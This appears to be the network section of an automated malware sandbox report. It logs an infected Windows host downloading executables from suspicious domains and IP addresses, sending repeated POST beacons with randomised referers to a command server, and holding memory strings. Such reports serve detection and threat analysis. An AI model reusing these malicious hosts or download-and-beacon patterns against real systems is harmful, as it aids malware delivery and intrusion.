                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Jan 2022 12:59:50 GMTServer: Apache/2.4.38 (Win32) PHP/7.1.26Last-Modified: Fri, 14 Jan 2022 11:52:33 GMTETag: "57200-5d589703dfedc"Accept-Ranges: bytesContent-Length: 356864Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw:
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Jan 2022 12:59:56 GMTServer: Apache/2.4.38 (Win32) PHP/7.1.26Last-Modified: Fri, 14 Jan 2022 10:54:23 GMTETag: "246ec0-5d588a02be749"Accept-Ranges: bytesContent-Length: 2387648Content-Type: application/x-msdownloadData Raw:
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 13:00:02 GMTContent-Type: application/x-msdos-programContent-Length: 905216Connection: closeLast-Modified: Thu, 13 Jan 2022 15:53:07 GMTETag: "dd000-5d578aeb4049d"Accept-Ranges: bytesData Raw:
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 13:00:05 GMTContent-Type: application/x-msdos-programContent-Length: 557664Connection: closeLast-Modified: Thu, 13 Jan 2022 19:20:04 GMTETag: "88260-5d57b92d7ebed"Accept-Ranges: bytesData Raw:
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Jan 2022 13:00:11 GMTServer: Apache/2.4.38 (Win32) PHP/7.1.26Last-Modified: Fri, 14 Jan 2022 11:02:40 GMTETag: "57200-5d588bdcf8dca"Accept-Ranges: bytesContent-Length: 356864Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw:
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Jan 2022 13:00:14 GMTServer: Apache/2.4.38 (Win32) PHP/7.1.26Last-Modified: Thu, 13 Jan 2022 16:32:58 GMTETag: "6e600-5d5793d3df2ef"Accept-Ranges: bytesContent-Length: 452096Content-Type: application/x-msdownloadData Raw:
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Jan 2022 13:00:15 GMTServer: Apache/2.4.38 (Win32) PHP/7.1.26Last-Modified: Fri, 14 Jan 2022 10:54:23 GMTETag: "246ec0-5d588a02be749"Accept-Ranges: bytesContent-Length: 2387648Content-Type: application/x-msdownloadData Raw:
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://doekvpclh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 268Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cfaivcludy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 269Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ydoois.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 238Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jpiiaqw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 296Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aoblnua.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 251Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://riacbys.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 143Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://elxvnyxk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 148Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mcvlfhw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 294Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /files/9030_1641816409_7037.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wrbmaiqv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 322Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wqgqp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 330Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fenydm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 141Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://firfcooyt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 310Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /downloads/toolspab3.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacy-tools-for-you-780.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rwudvrtrt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 174Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://omhff.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 230Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fbfbuopuh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 155Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fdhmpp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 342Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yyvmhh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 244Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://carudedeao.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 279Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ihkfjyj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 331Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sqcnkaq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 192Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nbxmbl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 316Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ecbfled.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 219Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /6.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.7.214.171:8080
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://emncntmtow.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 113Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qsefotqodc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 366Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mbnpyehjf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 141Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pehjgpd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 318Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vpoejhbse.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 321Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xemsp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 249Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://juqsasu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 111Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vmgenst.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 227Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bfkxhfurw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 365Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jldaqud.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 128Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yoawoahu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 278Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ulvvu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 116Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jndibx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 170Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aifro.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 321Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://awvcsqp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 188Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hsqarkq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 192Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ucyfot.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xjtksbsy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 189Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ppqljylf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 343Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fxxlivvp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kkdbsrky.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 287Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://deegamxl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 141Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xcxiyncehq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 154Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wsvmrr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 349Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jqpeh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 121Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oaaiijnxpe.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 353Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /files/8474_1641976243_3082.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jaevdkvwx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 198Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jqjxcwg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 167Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /101.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 81.163.30.181
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rllyqcpmf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 170Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yftnkjjlq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 183Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ufufplcjp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 217Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kbvly.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 258Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lhythml.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 239Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xfgpe.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 144Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dleeejmcen.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 278Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://owkrx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 309Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /files/7729_1642101604_1835.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tqglpd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 280Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vednhhpcxu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 159Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /6236.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 81.163.30.181
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://asmhpljw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 257Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kakoewy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 364Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ukwfgyyso.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 290Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yqamoj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 316Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fqxsvrlwpv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 125Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bjxsvd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 157Host: host-data-coin-11.com
                      Source: global trafficTCP traffic: 192.168.2.3:49805 -> 185.7.214.171:8080
                      Source: svchost.exe, 0000001D.00000002.458361159.000001A703CEA000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: svchost.exe, 0000001D.00000003.429658968.000001A704396000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.429753863.000001A7043D6000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.429727028.000001A7043A0000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.432868091.000001A704802000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.429683112.000001A704384000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.429988356.000001A7043B6000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.432785996.000001A704372000.00000004.00000001.sdmpString found in binary or memory: http://help.disneyplus.com.
                      Source: svchost.exe, 00000006.00000002.308807021.0000023970013000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
                      Source: svchost.exe, 00000003.00000002.580585277.00000272F7E43000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                      Source: svchost.exe, 00000003.00000002.580585277.00000272F7E43000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
                      Source: svchost.exe, 00000003.00000002.580585277.00000272F7E43000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
                      Source: FD6B.exe, 0000001A.00000002.474578999.0000000004111000.00000004.00000001.sdmp, FD6B.exe, 0000001A.00000002.474770371.0000000004281000.00000004.00000001.sdmpString found in binary or memory: https://api.ip.sb/ip
                      Source: svchost.exe, 00000006.00000003.308278113.0000023970060000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                      Source: svchost.exe, 00000003.00000002.580585277.00000272F7E43000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 00000003.00000002.580585277.00000272F7E43000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 00000006.00000003.308306128.000002397005C000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 00000006.00000003.308278113.0000023970060000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                      Source: svchost.exe, 00000006.00000003.308331102.000002397003D000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.308919758.000002397003E000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                      Source: svchost.exe, 00000006.00000003.308241819.0000023970067000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.309062464.0000023970069000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
                      Source: svchost.exe, 00000006.00000003.308278113.0000023970060000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                      Source: svchost.exe, 00000006.00000003.308331102.000002397003D000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.308357030.0000023970047000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.308963740.000002397004E000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exe, 00000006.00000003.286395108.0000023970031000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
                      Source: svchost.exe, 00000006.00000003.308278113.0000023970060000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                      Source: svchost.exe, 00000006.00000003.308331102.000002397003D000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.308919758.000002397003E000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
